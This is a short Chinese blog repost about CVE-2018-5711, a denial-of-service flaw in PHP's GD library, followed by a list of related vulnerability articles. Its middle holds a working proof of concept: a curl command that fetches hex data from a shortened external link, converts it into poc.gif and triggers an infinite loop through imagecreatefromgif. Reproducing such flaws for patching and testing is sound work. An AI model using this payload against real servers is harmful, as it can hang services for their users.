CVE-2018-5711:PHP GD库拒绝服务漏洞
2018-02-08 10:20
966 查看
阿里云发布的PHP高危漏洞
这肯定要修补啊,官方解决方案就是升级到最新版
升级过程就不说了
编译----安装
期间各种BUG,很恶心
事后,觉得这漏洞还挺好,就给大家转载下
有时间的可以自己测试下
不要捣蛋哦,小朋友们
PoC
下载捣蛋文件
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
本机函数测试
$ php -r 'imagecreatefromgif("poc.gif");'
结果自循环,请使用ctrl+c
Infinite loop here...
相关文章推荐
- FreeBSD 拒绝服务安全漏洞(CVE-2018-6923)
- Linux kernel 拒绝服务安全漏洞(CVE-2018-6555)
- PHP载入GIF图像造成服务器宕机(CVE-2018-5711)的漏洞复现
- ImageMagick 拒绝服务安全漏洞( CVE-2018-16644)
- 使用 Docker 测试 PHP CVE-2018-5711 漏洞
- Linux kernel 拒绝服务安全漏洞(CVE-2018-6554)
- X.Org libX11 拒绝服务安全漏洞(CVE-2018-14598)
- WordPress 3.8.1 /xmlrpc.php拒绝服务漏洞
- WordPress存在DoS拒绝服务漏洞,推荐删除根目录下的xmlrpc.php
- PHP重大漏洞又出 多语言拒绝服务漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- CVE-2018-18320 - 华硕路由器 Merlin.php 命令执行漏洞
- CVE-2018-18319 - 华硕路由器 Merlin.php 代码执行漏洞
- WordPress 3.5.1 crypt_private()远程拒绝服务漏洞(CVE-2013-2173)
- BIND DNS拒绝服务漏洞 CVE-2016-2776修复
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- PHP ‘scan’函数拒绝服务漏洞
- Apache CXF多个远程拒绝服务漏洞(CVE-2013-2160)
- PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF(Dos)
- Linux Kernel空指针引用本地拒绝服务漏洞(CVE-2013-5634)